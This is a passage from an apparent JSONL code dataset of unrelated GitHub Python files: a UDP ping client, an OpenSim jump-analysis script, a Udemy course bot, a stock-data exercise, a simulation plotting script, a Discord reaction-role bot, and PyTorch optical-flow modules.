e:\n dropped_num+=1\n return \"Ping message \"+ str(sequence_num) + \" timed out\"\n\n\n# Sends the packets to server \ndef send_message(message, wait = False): # Sends the packets to server\n packed_data = pack('!hH', 1, sequence_num)\n clientsocket.sendto(packed_data,(host, port))\n\n if wait == False:\n return\n else:\n return response_from()\n\n\n# Loop controlling Number of Sending & Recieving transmission \nwhile sequence_num <= num:\n start = timer() # Starting timer\n data = \"\"\n dataEcho = \"\"\n recieved = send_message(data, True)\n end = timer() # Ending timer\n recieved_type = recieved # Stores return value\n rrttime = end - start # Calculate sec\n if recieved_type == \"PING\": # Excute when return value is PING\n print(\"Ping message number \" + str(sequence_num) + \" RTT: %f6 sec\" % rrttime)\n avg_rttime = avg_rttime + rrttime\n if rrttime < min_rttime or min_rttime == 0:\n min_rttime = rrttime\n if rrttime > max_rttime or max_rttime == 0:\n max_rttime = rrttime\n\n else: # Excute when return value is Timeout or not PING and prints what was returned\n print(recieved)\n\n sequence_num+=1 # Increments Sequence\n\n# Closes the client socket\nclientsocket.close()\n\n# Calculate Recieved Values & Package Lost Percentage \nrecieved = num - dropped_num\npercentage = dropped_num * 10\n\n# Prints Statistics after the num of Sending & Recieving Transmission\nprint(\"\\nStatistics:\")\nprint(str(num) + \" packets trasmitted, \" + str(recieved) + \" recieved, \" + str(percentage) + \"% packetloss\")\nprint(\"Min/Max/Avg RTT: min= %f6 / %f6 / %f6\" % (min_rttime, max_rttime, (avg_rttime/num)))\n\n \n","repo_name":"BrandanW123/Networking-UDP-Ping-Client-and-Server","sub_path":"ping-client.py","file_name":"ping-client.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12515314486","text":"#!/usr/bin/python3\nimport xml.etree.ElementTree as ET\nimport sys,os\nfrom math import pi\nfrom stoheader import getstovalue,lastval\ntrajfile='Analyzes/Etraj30.0.0.0.055.sto'\nif len(sys.argv)>1:\n\ttrajfile=sys.argv[1]\n\tprint(\"computing on\",sys.argv[1])\nprint(\"-----start fixing actuators.xml-----\")\nellip=getstovalue(trajfile,'ellipticb');ellip=ellip[:-3]\nprint(\"reading variables from traj\")\nspA=getstovalue(trajfile,'num_of_springs_ankle');stifA=float(spA)*5/(0.05*0.05*pi/2)\nspH=getstovalue(trajfile,'num_of_springs_hip');stifH=float(spH)*5/(0.05*0.05*pi/2)\nspK=getstovalue(trajfile,'num_of_springs_knee');stifK=float(spK)*5/(0.05*0.05*pi/2)\nprint(spK,spH,spA,ellip)\nosimfilename=\"src/ellipse\"+ellip+\".osim\"\ntofill = ET.parse('actuators.xml')\nfiller = ET.parse(osimfilename)\ntofillroot=tofill.getroot()\ngotsprings=filler.findall('.//PathSpring')\ngotNL=filler.findall('.//NonlinearSpring')\nprint(\"removing nonlinear springs from actuators.xml\")\nprint(\"removing\",tofillroot[0][0].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][0])\nprint(\"removing\",tofillroot[0][3].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][3])\nprint(\"removing\",tofillroot[0][3].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][3])\nprint(\"setting A/H/K to:\",stifA,stifH,stifK)\n\nprint(\"replacing stiffnesses values at actuators.xml\")\nprint(\"replacing\", gotsprings[1].get(\"name\"),\"to\", stifH)\ngotsprings[1].find(\"stiffness\").text=str(stifH )\nprint(\"replacing\",gotsprings[2].get(\"name\"),\"to\", stifA)\ngotsprings[2].find(\"stiffness\").text=str(stifA) \nprint(\"replacing\",gotNL[0].get(\"name\"),\"to\", stifK)\ngotNL[0].find(\"stiffness\").text=str(stifK )\ntofillroot[0].append(gotsprings[1])\ntofillroot[0].append(gotsprings[2])\ntofillroot[0].append(gotNL[0])\nprint(\"writing newactuators.xml as actuators\")\ntofill.write(\"newactuators.xml\")\nprint(\"-----start fixing analyze2.xml-----\")\n\nan2 = ET.parse('analyze2.xml')\nan2root=an2.getroot()\nprint(\"setting analyis name\")\nr=trajfile.split(\"/\")\nan2root[0].set(\"name\",\"EHA\"+r[1][5:-4])\nprint(\"relplacing controls_file states_file datafile\")\nan2root.find(\".//controls_file\").text=trajfile\nan2root.find(\".//states_file\").text=trajfile\nan2root.find(\".//datafile\").text=\"results/EGRF\"+trajfile[14:-4]+\".sto\"\nan2root.find(\".//model_file\").text=\"src/ellipse\"+ellip+\".osim\"\nprint(\"writing analyze2.xml \")\nan2.write(\"analyze2.xml\")\nos.system(\"opensim-cmd run-tool analyze2.xml&>/dev/null\")\nprint(\"query last point trajfrom\",trajfile[:-4].replace(\"traj\",\"HA\"))\nY=lastval(trajfile[:-4].replace(\"traj\",\"HA\")+'_BodyKinematics_pos_global.sto',\"center_of_mass_Y\")\nV=lastval(trajfile[:-4].replace(\"traj\",\"HA\")+'_BodyKinematics_vel_global.sto',\"center_of_mass_Y\")\nY=float(Y);V=float(V)\nprint(\"found Y and V\",Y,V)\nprint(spK,spH,spA,ellip,Y+V*V/2/9.81)\n\n#fil=sys.argv[1]\n#treename=sys.argv[2]\n#intree=ET.parse(fil)\n#dom = xml.dom.minidom.parse(fil) \n\n\n","repo_name":"ostr1969/contUpDown3Moco","sub_path":"Ellipse/computejump.py","file_name":"computejump.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17308512404","text":"import udemy\nimport json\nimport Objects\nimport database\n\n##############################\n# TRANSFORMATION FUNCTIONS #\n############################\n\n\ndef course_list_to_links(courses):\n message = \"\\n\"\n count = 0\n number_emojis = ['1️⃣', '2️⃣', '3️⃣']\n for course in courses:\n course_line = number_emojis[count]+' : \\n'\n course_link = 'udemy.com/course/'+course.link\n message += course_line+course_link+'\\n\\n'\n\n count += 1\n\n return message\n\n\ndef courses_to_ids(courses):\n ids = []\n for course in courses:\n ids.append(str(course.unique))\n return ids\n\n\ndef course_list_to_message(courses):\n message = \"\\n\\n\"\n for course in courses:\n course_line = course.title+': \\n'\n course_link = 'udemy.com/course/'+course.link\n message += course_line+course_link\n message += '\\n\\n'\n\n return message\n\n##############################################\n# UDEMY API COURSES FUNCTIONS #\n############################################\n\n\ndef recomend_courses_to_user(topic, user, lang='es', amount=1):\n \"\"\"\n Selects courses of X topic from the database\n It excludes courses already recommended to the user\n If the quota of courses hasnt been fulfilled, then we search\n courses in the udemy API\n We add these courses to the database so that they can be\n recommended\n\n :param topic: The course topic\n :param user: Twitter user ID\n :param lang: language (for search purposes)\n :param amount: amount of courses to be recommended\n :return: List of courses\n \"\"\"\n\n # Obtain courses from database which are not in user courses list\n courses = database.give_courses_to_user(topic, lang, user, amount)\n\n # If the courses from database satisfy the quota, it is not\n # necessary to use the Udemy API\n size = len(courses)\n if size >= amount:\n return courses\n\n # Determine the amount of courses with same keyword and language in database\n # Then, calculate the start page for udemy API\n # This serves to potentially reduce time of searching\n topic_count = database.count_keyword(topic, lang)\n start_page = max(1, topic_count//10)\n\n # Get new courses from Udemy API\n additional_courses = search_udemy_courses(topic, amount-size, size=10, page=start_page, lang=lang).values()\n\n # Store courses in database\n database.register_many_courses(additional_courses)\n\n # Update id values of additional courses objects\n # Obtain the unique keys from database\n\n updated_additional_courses = []\n\n for additional_course in additional_courses:\n additional_course_object = database.get_course_by_id(additional_course.id)\n updated_additional_courses.append(additional_course_object)\n\n # Add new courses objects to courses to return\n courses.extend(updated_additional_courses)\n\n return courses\n\n\ndef get_course_details(course_id):\n details = Client.get_coursesdetail(course_id)\n parsed_details = json.loads(details)\n return parsed_details\n\n\ndef get_course_for_top(topic, lang='es'):\n\n course = database.get_course_from_database(topic, lang)\n if course is None:\n course = search_udemy_course(topic, lang, order='newest')\n if course is not None:\n database.register_course(course, topic)\n\n return course\n\n\ndef search_udemy_course(topic, lang='es', size=10, page=1, tries=0, order='relevance'):\n\n # Udemy API request\n course_list = Client.get_courseslist(language=lang, search=topic, page_size=size, page=page, price=\"price-free\",\n ordering=order)\n parsed_courses = json.loads(course_list)\n course_list = parsed_courses['results']\n amount = len(course_list)\n\n # If there are no courses we return an empty list\n if amount == 0 or tries >= 10:\n return None\n\n for course in course_list:\n course_id = int(course['id'])\n course_object = database.get_course_by_id(course_id)\n\n # If course is not none, then it is already in database\n if course_object is not None:\n continue\n\n course_title = course['title']\n course_link = course['url']\n course_link = course_link.replace('/course/', '')\n\n return Objects.Course(course_id, course_title, course_link, topic, lang=lang)\n\n\ndef search_udemy_courses(topic, amount, lang='es', size=10, page=1, tries=0, course_set=None, order='relevance'):\n\n if course_set is None:\n course_set = {}\n\n # If tried 2 times, change search settings to give priority to newer courses\n if tries == 2:\n page = 1\n order = 'newest'\n\n course_list = Client.get_courseslist(language=lang, search=topic, page_size=size, page=page, price=\"price-free\",\n ordering=order)\n parsed_courses = json.loads(course_list)\n course_list = parsed_courses['results']\n course_amount = len(course_list)\n\n # If there are no courses we return an empty list\n if course_amount == 0 or (page*size) >= 10000 or tries >= 5:\n return course_set\n\n for course in course_list:\n\n course_id = int(course['id'])\n course_object = database.get_course_by_id(course_id)\n\n # If course is not none, then it is already in database\n if course_object is not None:\n continue\n\n course_title = course['title']\n course_link = course['url']\n course_link = course_link.replace('/course/', '')\n\n course_object = Objects.Course(course_id, course_title, course_link, topic, lang=lang)\n course_set.update({course_object.id: course_object})\n\n if len(course_set) >= amount:\n return course_set\n\n if len(course_set) >= amount:\n return course_set\n\n return search_udemy_courses(topic, amount, lang, size, page+1, tries+1, course_set, order=order)\n\n\n# API INITIALIZATION\nClient = udemy.PyUdemy(clientID=\"Your udemy client id\",\n clientSecret=\"your udemy api secret\")\n\n\n","repo_name":"GuillermoClara/GratisBot","sub_path":"udemy_handler.py","file_name":"udemy_handler.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"39820796917","text":"\n# Constantes para indexar os tuplos:\nNAME,DATE,OPEN,MAX,MIN,CLOSE,VOLUME = 0,1,2,3,4,5,6\n\ndef main():\n lst = loadStockFile(\"nasdaq.csv\")\n # Show just first and last tuples:\n print(\"first:\", lst[1])\n print(\"last:\", lst[-1])\n \n print(\"a) totVol=\", totalVolume(lst))\n\n print(\"b) maxVal=\", maxValorization(lst))\n \n stocksDic = stocksByDateByName(lst)\n print(\"c) CSCO@11:\", stocksDic['2020-10-12']['CSCO'])\n print(\"c) AMZN@22:\", stocksDic['2020-10-22']['AMZN'])\n port = {'NFLX': 100, 'CSCO': 80}\n print(\"d) portfolio@01:\", portfolioValue(stocksDic, port, \"2020-10-01\"))\n print(\"d) portfolio@30:\", portfolioValue(stocksDic, port, \"2020-10-30\"))\n \ndef loadStockFile(filename):\n lst = []\n with open(filename) as f:\n for line in f:\n parts = line.strip().split('\\t')\n name = parts[NAME]\n date = parts[DATE]\n tup = (name, date, float(parts[OPEN]), float(parts[MAX]),\n float(parts[MIN]), float(parts[CLOSE]), int(parts[VOLUME]))\n lst.append(tup)\n return lst\n\ndef totalVolume(lst):\n totVol = {}\n for tup in lst:\n totVol[tup[NAME]] = totVol.get(tup[NAME], 0) + tup[VOLUME]\n return totVol\n\ndef maxValorization(lst):\n vMax = {}\n for tup in lst:\n vMax.setdefault(tup[DATE], (\"Bax\",0))\n\n for tup in lst:\n valorizacao = tup[CLOSE]/tup[OPEN] - 1\n if valorizacao > vMax[tup[DATE]][1]:\n vMax[tup[DATE]] = (tup[NAME], valorizacao)\n\n return vMax\n\ndef stocksByDateByName(lst):\n dic = {}\n for tup in lst:\n dic.setdefault(tup[DATE], {})\n for tup in lst:\n dic[tup[DATE]][tup[NAME]] = [tup[OPEN], tup[MAX], tup[MIN], tup[CLOSE], tup[VOLUME]]\n return dic\n\ndef portfolioValue(stocks, portfolio, date):\n assert date in stocks\n val = 0.0\n for key in portfolio:\n val += stocks[date][key][3] * portfolio[key]\n\n return val\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"abutuc/archive-university-of-aveiro","sub_path":"Programming Fundamentals/aula07/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35919925615","text":"import matplotlib.pyplot as plt\nfrom ase.io import read\nimport numpy as np\nimport sys\n\ndef moving_average(a, n=3):\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n\ndef rolling_window(a, window):\n #pad = np.ones(len(a.shape), dtype=np.int32)\n #pad[-1] = window-1\n #pad = list(zip(pad, np.zeros(len(a.shape), dtype=np.int32)))\n #a = np.pad(a, pad,mode='reflect')\n shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)\n strides = a.strides + (a.strides[-1],)\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\nfig = plt.figure()\nax = fig.add_subplot(211)\ntx = fig.add_subplot(212)\nnx = tx.twinx()\n\nfname = sys.argv[1]\ndname = sys.argv[1].split('/')\ndname = '/'.join(dname[:-1])\n\n# Cut data that won't get averaged\nnave = 10 # Parameter\nif len(sys.argv)>2:\n nave = int(sys.argv[2])\ndata = np.loadtxt(fname)\nv0 = read(dname+'/model.xyz').get_volume()\nnrows = data.shape[0]\nnaves = nrows//nave\ndata = data[:int(naves*nave), :]\n\npressure = data[:, 3:6]\npbar = pressure.mean(axis=1)\npma = moving_average(pbar, n=nave)\npx = moving_average(pressure[:, 0], n=nave)\npy = moving_average(pressure[:, 1], n=nave)\npz = moving_average(pressure[:, 2], n=nave)\nif len(sys.argv)>3:\n pmst = rolling_window(pbar, nave).std(axis=-1)\nt = np.arange(pma.size)\npwin = pbar.reshape((-1, nave)).mean(axis=1)\npstd = pbar.reshape((-1, nave)).std(axis=1)\npm = pwin-pstd\npp = pwin+pstd\ntwin = np.arange(pwin.size)*nave\n\nax.plot(t, px, color='b', alpha=0.1)\nax.plot(t, py, color='b', alpha=0.1)\nax.plot(t, pz, color='b', alpha=0.1)\nax.hlines(0, t.min(), t.max(), color='k', zorder=0, alpha=0.8)\nax.fill_between(twin, pm, pp, color='b', alpha=0.2)\nax.plot(twin, pwin, alpha=1, color='b')\nax.plot(t, pma, alpha=0.6, color='b')\nax.set_xlabel('time (tau)')\nax.set_ylabel('P (GPa)')\nif len(sys.argv)>3:\n ax.plot(t, pma+pmst, alpha=0.4, color='b')\n ax.plot(t, pma-pmst, alpha=0.4, color='b')\nax.set_ylim([pma.min()-0.05, pma.max()+0.05])\n\nvolume = data[:, -3:]\nvbar = np.prod(volume, axis=1)\nvma = moving_average(vbar, nave)\nvma /= v0\nvma *= 100\nvma -= 100\nt = np.arange(vma.size)\n\ntx.plot(t, vma, color='r', alpha=1)\ntx.fill_between(t, vma, 0, color='r', alpha=0.1)\ntx.set_ylabel('Volume (A3)')\n#tx.set_ylim([1.-vf, 1.+vf])\n\ntemp = data[:, 0]\ntma = moving_average(temp, nave)\ntmin = tma.min()\ntmax = tma.max()\n\nnx.plot(t, tma, color='g', alpha=1)\nnx.set_ylim([tmin, tmax])\n\nplt.savefig(dname+'/PVT.png')\nprint('done!')\n","repo_name":"niklundgren/spanners","sub_path":"matsci/projects/amorphouscarbon/pressure-volume.py","file_name":"pressure-volume.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5848200499","text":"import discord\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint(\"Bot connecté !\")\n \n@client.event\nasync def on_raw_reaction_add(payload):\n\n message_id = payload.message_id # recuperer l'ID du message qui reçoit la réation\n\n\n if message_id == 634732408016601186: # verifier que c'est bien le message que l'on veut\n \n if payload.emoji.name == \"✅\":\n role_id = 634732495849521163 # recuperer l'ID du role\n elif payload.emoji.name == \"❌\":\n role_id = 634732552342601740\n else:\n print(\"Pas de correspondance\")\n\n guild_id = payload.guild_id # recuperer l'ID du serveur\n guild = client.get_guild(guild_id) # recuperer le serveur à partir de l'ID\n\n user_id = payload.user_id # recuperer l'ID de l'user\n member = guild.get_member(user_id) # recuperer le membre à partir de l'ID de l'user\n\n role = guild.get_role(role_id) # recuperer le role à partir de l'ID du role\n\n await member.add_roles(role)\n\n \n\n@client.event\nasync def on_raw_reaction_remove(payload): # exactement la même chose\n # à part qu'il faut enlever le role au lieu de l'ajouter\n\n message_id = payload.message_id\n\n\n if message_id == 634732408016601186:\n \n if payload.emoji.name == \"✅\":\n role_id = 634732495849521163\n elif payload.emoji.name == \"❌\":\n role_id = 634732552342601740\n else:\n print(\"Aucun role ne correspond à cet emoji\")\n print(payload.emoji.name)\n\n guild_id = payload.guild_id\n guild = client.get_guild(guild_id)\n user_id = payload.user_id\n member = guild.get_member(user_id)\n role = guild.get_role(role_id)\n\n await member.remove_roles(role) # <------------ remove_roles() au lieu de add_roles()\n\nclient.run(\"\")","repo_name":"GravenDiscordPy/Graven_Discord.py","sub_path":"Commandes/ReactionRole.py","file_name":"ReactionRole.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18534517667","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport sys\nimport warnings\nfrom thop import profile\ntry:\n from .warplayer import multi_warp\nexcept:\n from model.warplayer import multi_warp\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nfrom models import flow_pwc\n\ndef pad(img, ratio=32):\n if len(img.shape) == 5:\n b, n, c, h, w = img.shape\n img = img.reshape(b * n, c, h, w)\n ph = ((h - 1) // ratio + 1) * ratio\n pw = ((w - 1) // ratio + 1) * ratio\n padding = (0, pw - w, 0, ph - h)\n img = F.pad(img, padding, mode='replicate')\n img = img.reshape(b, n, c, ph, pw)\n return img\n elif len(img.shape) == 4:\n n, c, h, w = img.shape\n ph = ((h - 1) // ratio + 1) * ratio\n pw = ((w - 1) // ratio + 1) * ratio\n padding = (0, pw - w, 0, ph - h)\n img = F.pad(img, padding, mode='replicate')\n return img\n\ndef conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n nn.PReLU(out_planes)\n )\n\n\ndef deconv(in_planes, out_planes, kernel_size=4, stride=2, padding=1):\n return nn.Sequential(\n torch.nn.ConvTranspose2d(in_channels=in_planes, out_channels=out_planes,\n kernel_size=kernel_size, stride=stride, padding=padding, bias=True),\n nn.PReLU(out_planes)\n )\n\n\ndef conv_woact(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n )\n\ndef conv_wo_act(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n )\n\ndef get_same_padding(kernel_size, dilation):\n kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)\n padding = (kernel_size - 1) // 2\n return padding\n\nclass ResBlock(nn.Module):\n def __init__(self, inplanes, planes, kernel_size=3, stride=1, dilation=1):\n super(ResBlock, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=kernel_size, stride=stride,\n padding=get_same_padding(kernel_size, dilation), dilation=dilation)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size, stride=1,\n padding=get_same_padding(kernel_size, dilation), dilation=dilation)\n self.relu = nn.PReLU(planes)\n\n self.res_translate = None\n if not inplanes == planes or not stride == 1:\n self.res_translate = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride)\n\n def forward(self, x):\n residual = x\n\n out = self.relu(self.conv1(x))\n out = self.conv2(out)\n if self.res_translate is not None:\n residual = self.res_translate(residual)\n out += residual\n\n return out\n\nclass IFBlock(nn.Module):\n def __init__(self, in_planes, scale=1, c=64, num_flows=3, mode='backward'):\n super(IFBlock, self).__init__()\n self.scale = scale\n self.conv0 = nn.Sequential(\n conv(in_planes, c, 3, 2, 1),\n conv(c, 2 * c, 3, 2, 1),\n )\n self.convblock = nn.Sequential(\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n )\n if mode == 'backward':\n self.conv1 = nn.ConvTranspose2d(2 * c, 2 * num_flows * 2, 4, 2, 1) # TODO WARNING: Notable change\n elif mode == 'forward':\n self.conv1 = nn.ConvTranspose2d(2 * c, 2 * num_flows * 3, 4, 2, 1) # TODO WARNING: Notable change\n else:\n raise ValueError\n\n def forward(self, x):\n if self.scale != 1:\n x = F.interpolate(x, scale_factor=1. / self.scale, mode=\"bilinear\",\n align_corners=False)\n # print(x.size())\n\n x = self.conv0(x)\n x = self.convblock(x)\n flow = self.conv1(x)\n # print(flow.size())\n if self.scale != 1:\n flow = F.interpolate(flow, scale_factor=self.scale, mode=\"bilinear\",\n align_corners=False)\n # print(flow.size())\n return flow\n\n\nclass FlowNetMulCatFusion(nn.Module):\n def __init__(self, num_flows=3):\n super(FlowNetMulCatFusion, self).__init__()\n self.num_flows = num_flows\n self.block0 = IFBlock(in_planes=6 + 2 * num_flows, scale=8, c=192, num_flows=num_flows)\n self.conv0 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block1 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=4, c=128, num_flows=num_flows)\n self.conv1 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block2 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=2, c=96, num_flows=num_flows)\n self.conv2 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block3 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=1, c=48, num_flows=num_flows)\n self.conv3 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n\n def _mul_encoding(self, flows, encodings):\n n, c, h, w = flows.shape\n assert encodings.shape == (n, int(c / 2), h, w), '{} != {}'.format(encodings.shape, (n, int(c / 2), h, w))\n flows = flows.reshape(n, int(c / 2), 2, h, w)\n encodings = encodings.reshape(n, int(c / 2), 1, h, w)\n flows *= encodings\n flows = flows.reshape(n, c, h, w)\n return flows\n\n def forward(self, x, encoding, return_velocity=False):\n x_t2b, x_b2t = torch.chunk(x, chunks=2, dim=1) # (n, 3, h, w)\n encoding_ds = F.interpolate(encoding, scale_factor=0.5, mode='bilinear', align_corners=False,\n recompute_scale_factor=False)\n\n flow0 = self.block0(torch.cat((x, encoding), dim=1)) # h/2,w/2\n F1 = flow0\n F1 = self._mul_encoding(F1, encoding_ds)\n F1 = self.conv0(F1)\n F1_large = F.interpolate(F1, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F1_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F1_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow1 = self.block1(torch.cat((warped_imgs, encoding, F1_large), dim=1)) # h/2,w/2\n F2 = (flow0 + flow1)\n F2 = self._mul_encoding(F2, encoding_ds)\n F2 = self.conv1(F2)\n F2_large = F.interpolate(F2, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F2_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F2_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow2 = self.block2(torch.cat((warped_imgs, encoding, F2_large), dim=1)) ## h/2,w/2\n F3 = (flow0 + flow1 + flow2)\n F3 = self._mul_encoding(F3, encoding_ds)\n F3 = self.conv2(F3)\n F3_large = F.interpolate(F3, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F3_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F3_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow3 = self.block3(torch.cat((warped_imgs, encoding, F3_large), dim=1)) ## h/2,w/2\n F4 = (flow0 + flow1 + flow2 + flow3)\n F4 = self._mul_encoding(F4, encoding_ds)\n F4 = self.conv3(F4)\n\n if return_velocity:\n return F4, [F1, F2, F3, F4], flow0 + flow1 + flow2 + flow3\n return F4, [F1, F2, F3, F4]\n\n\nclass ConvDS(nn.Module):\n def __init__(self, in_planes, out_planes, stride=2):\n super(ConvDS, self).__init__()\n self.conv1 = conv(in_planes, out_planes, 3, stride, 1)\n self.conv2 = conv(out_planes, out_planes, 3, 1, 1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass WarpedContextNet(nn.Module):\n def __init__(self, c=16, num_flows=3):\n super(WarpedContextNet, self).__init__()\n self.num_flows = num_flows\n self.conv0_0 = ConvDS(3, c)\n self.conv1_0 = ConvDS(c, c)\n self.conv1_1 = conv(num_flows * c, c, kernel_size=1, padding=0, stride=1)\n self.conv2_0 = ConvDS(c, 2 * c)\n self.conv2_1 = conv(num_flows * (2 * c), 2 * c, kernel_size=1, padding=0, stride=1)\n self.conv3_0 = ConvDS(2 * c, 4 * c)\n self.conv3_1 = conv(num_flows * (4 * c), 4 * c, kernel_size=1, padding=0, stride=1)\n self.conv4_0 = ConvDS(4 * c, 8 * c)\n self.conv4_1 = conv(num_flows * (8 * c), 8 * c, kernel_size=1, padding=0, stride=1)\n\n def forward(self, x, flow):\n x = self.conv0_0(x)\n x = self.conv1_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f1 = multi_warp(x, flow)\n f1 = self.conv1_1(f1)\n\n x = self.conv2_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f2 = multi_warp(x, flow)\n f2 = self.conv2_1(f2)\n\n x = self.conv3_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f3 = multi_warp(x, flow)\n f3 = self.conv3_1(f3)\n\n x = self.conv4_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f4 = multi_warp(x, flow)\n f4 = self.conv4_1(f4)\n return [f1, f2, f3, f4]\n\n\nclass IFEDNet(nn.Module):\n def __init__(self, c=16, num_flows=3):\n self.num_flows = num_flows\n super(IFEDNet, self).__init__()\n self.conv0 = ConvDS(2 * (3 + 2) * num_flows, c)\n self.down0 = ConvDS(c, 2 * c)\n self.down1 = ConvDS(4 * c, 4 * c) # +2c\n self.down2 = ConvDS(8 * c, 8 * c) # +4c\n self.down3 = ConvDS(16 * c, 16 * c) # +8c\n self.up0 = deconv(32 * c, 8 * c) # +16c\n self.up1 = deconv(16 * c, 4 * c)\n self.up2 = deconv(8 * c, 2 * c)\n self.up3 = deconv(4 * c, c)\n self.conv1 = deconv(c, 4 * num_flows, 4, 2, 1)\n\n def forward(self, img_t2b, img_b2t, flow_t2b, flow_b2t, c_t2b, c_b2t):\n warped_t2b_imgs = multi_warp(img_t2b, flow_t2b) # (n, num_flows*3, h, w)\n warped_b2t_imgs = multi_warp(img_b2t, flow_b2t) # (n, num_flows*3, h, w)\n\n d0 = self.conv0(torch.cat((warped_t2b_imgs, warped_b2t_imgs, flow_t2b, flow_b2t), dim=1))\n d0 = self.down0(d0)\n d1 = self.down1(torch.cat((d0, c_t2b[0], c_b2t[0]), dim=1))\n d2 = self.down2(torch.cat((d1, c_t2b[1], c_b2t[1]), dim=1))\n d3 = self.down3(torch.cat((d2, c_t2b[2], c_b2t[2]), dim=1))\n out = self.up0(torch.cat((d3, c_t2b[3], c_b2t[3]), dim=1))\n out = self.up1(torch.cat((out, d2), dim=1))\n out = self.up2(torch.cat((out, d1), dim=1))\n out = self.up3(torch.cat((out, d0), dim=1))\n out = self.conv1(out)\n\n res = torch.sigmoid(out[:, :3 * self.num_flows]) * 2 - 1\n mask = torch.sigmoid(out[:, 3 * self.num_flows:]) # (n, 3, h, w)\n n, c, h, w = warped_t2b_imgs.shape\n warped_t2b_imgs = warped_t2b_imgs.reshape(n, self.num_flows, 3, h, w)\n warped_b2t_imgs = warped_b2t_imgs.reshape(n, self.num_flows, 3, h, w)\n mask = mask.reshape(n, self.num_flows, 1, h, w)\n warped_imgs = mask * warped_t2b_imgs + (1. - mask) * warped_b2t_imgs\n warped_imgs = warped_imgs.reshape(n, self.num_flows * 3, h, w)\n pred = warped_imgs + res\n pred = torch.clamp(pred, 0, 1)\n\n return pred\n\n\n\nclass RSG(nn.Module):\n def __init__(self, num_frames, n_feats, load_flow_net, flow_pretrain_fn):\n super(RSG, self).__init__()\n self.flow_net = FlowNetMulCatFusion(num_flows=num_frames)\n self.warped_context_net = WarpedContextNet(c=n_feats, num_flows=num_frames)\n self.ife_net = IFEDNet(c=n_feats, num_flows=num_frames)\n\n def forward(self, 